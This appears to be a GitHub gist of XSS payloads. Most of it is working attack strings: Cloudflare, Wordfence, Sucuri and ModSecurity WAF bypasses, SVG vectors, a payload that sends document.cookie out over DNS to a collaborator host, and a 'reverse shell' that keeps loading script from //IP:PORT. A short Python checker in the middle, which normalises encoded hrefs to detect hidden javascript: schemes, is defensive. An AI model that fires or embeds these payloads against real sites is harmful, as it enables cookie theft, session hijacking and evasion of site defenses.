
@helcaraxeals
Forked from pikpikcu/my-xss-diary.md
Created January 19, 2021 23:01
XSS

SVG animate XSS vector

filter-confusing

<script>
x = '<!--<script>'/*</script>-->*/;alert(1)
</script>

Nice one by @stealthybugs

<svg onload="import('data:text/javascript,al'+''+'ert(0)')">

WAF bypass payload against Firefox

<image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'>

More Cloudflare bypasses

<svg/onload=%26nbsp;alert`bohdan`+
1'"><img/src/onerror=.1|alert``>

<img src onerror=%26emsp;prompt`${document.domain}`>

Cookie theft over DNS via XSS

<script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script>

Each uppercase letter of the base64 is followed by a dot so it survives DNS lowercasing; decode by restoring the letter before each dot:

atob("Your_Received_DNS".replace(/(.)\./g, (_,x)=>x.toUpperCase()))

WAF XSS Bypasses

Wordfence 7.4.2

<a href=&#01javascript:alert(1)>

Sucuri CloudProxy (POST only)

<a href=javascript&colon;confirm(1)>

ModSecurity CRS 3.2.0 PL1

<a href="jav%0Dascript&colon;alert(1)">

SVG-embedded payload by

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(1)">
    <circle cx="50" cy="40" r="35"/>
  </a>
</svg>
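The Wordfence, Sucuri, ModSecurity and SVG entries above all hide the `javascript:` scheme behind entity, control-character or percent encodings that a literal-string WAF rule never sees. The checker below is added here as a defender-side example and is not part of the gist: it decodes an href value in the order the server and the browser would (percent-decoding, then HTML entities, then the URL parser's tab/LF/CR and leading-control stripping) and only then inspects the scheme. The decoding order, the scheme list and the sample set are assumptions; the sample hrefs are the ones from the payloads above.

```python
import html
import re
from urllib.parse import unquote

# Schemes that execute script when placed in href (assumed policy, not from the gist).
DANGEROUS_SCHEMES = {"javascript", "vbscript", "data"}

_TAB_LF_CR = re.compile(r"[\t\n\r]")        # URL parser removes these anywhere in the input
_LEADING_C0_SPACE = re.compile(r"^[\x00-\x20]+")  # and trims leading C0 controls / space
_SCHEME = re.compile(r"([a-zA-Z][a-zA-Z0-9+.\-]*):")


def normalize_href(raw: str) -> str:
    """Return the href as the browser's URL parser would see it.

    Assumed pipeline: the server percent-decodes the request parameter,
    the browser's HTML parser decodes character references inside the
    attribute (&colon; -> ':', &#9; -> TAB, &#01 -> U+0001), and the URL
    parser then drops tab/LF/CR and leading control characters.
    """
    value = unquote(raw)               # %0D -> CR (server side)
    value = html.unescape(value)       # named and numeric refs, with or without ';'
    value = _TAB_LF_CR.sub("", value)  # jav\rascript -> javascript
    return _LEADING_C0_SPACE.sub("", value)


def scheme_of(url: str) -> str:
    """Lower-cased scheme of a normalised URL, or '' for relative URLs."""
    m = _SCHEME.match(url)
    return m.group(1).lower() if m else ""


def is_dangerous_href(raw: str) -> bool:
    return scheme_of(normalize_href(raw)) in DANGEROUS_SCHEMES


# Constructed sample set: href values from the gist plus two benign controls.
SAMPLES = {
    "&#01javascript:alert(1)": True,            # Wordfence entry
    "javascript&colon;confirm(1)": True,        # Sucuri entry
    "jav%0Dascript&colon;alert(1)": True,       # ModSecurity CRS entry
    "javascript&#9;:alert(1)": True,            # SVG-embedded entry
    "https://example.com/page?q=javascript": False,
    "/relative/path": False,
}


def check_samples() -> dict:
    return {href: is_dangerous_href(href) for href in SAMPLES}


if __name__ == "__main__":
    for href, flagged in check_samples().items():
        print("BLOCK" if flagged else "allow", repr(href), "->", repr(normalize_href(href)))
```

A rule that matches the literal string `javascript:` on the raw parameter flags none of the four gist hrefs; the same rule applied after `normalize_href` flags all of them.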

remote JS reverse shell payload

<script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>

WAF bypass payload by @rbidou

window[document.body.innerText.charAt(document.body.innerText.indexOf('a'))+'lert'](1)

WAF bypass payload by @JayateerthaG

<img src=something onauxclick="new Function `al\ert\`xss\``">

nice quoteless one by @stealthybugs

<svg id=javascript:alert(10) onload=location=id>